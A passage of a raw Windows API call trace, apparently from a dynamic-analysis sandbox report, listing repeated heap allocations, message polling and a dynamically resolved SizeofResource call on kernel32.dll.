hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0119.640] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0119.640] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0119.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0119.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d98 [0119.641] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d98 | out: hHeap=0x12c0000) returned 1 [0119.641] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0119.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0119.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0119.642] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0119.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0119.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0119.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0119.643] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6e8 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0119.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd760 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6e8 | out: hHeap=0x12c0000) returned 1 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3e8 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0119.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0119.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.645] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0119.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0119.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0119.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xf) returned 0x14bd898 [0119.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x14bd898, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SizeofResource", lpUsedDefaultChar=0x0) returned 15 [0119.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0119.645] GetProcAddress (hModule=0x74650000, lpProcName="SizeofResource") returned 0x74668f80 [0119.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0119.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0119.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0119.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0119.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0119.646] SizeofResource (hModule=0x0, hResInfo=0xfe7688) returned 0x1c211 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd700 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0119.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0119.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0119.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0119.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0119.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd718 [0119.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0119.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0119.647] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0119.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.649] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0119.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0119.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0119.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0119.649] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.649] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0119.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.650] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0119.650] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0119.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0119.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0119.651] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0119.651] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0f0 [0119.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0119.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0f0 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.652] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.652] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 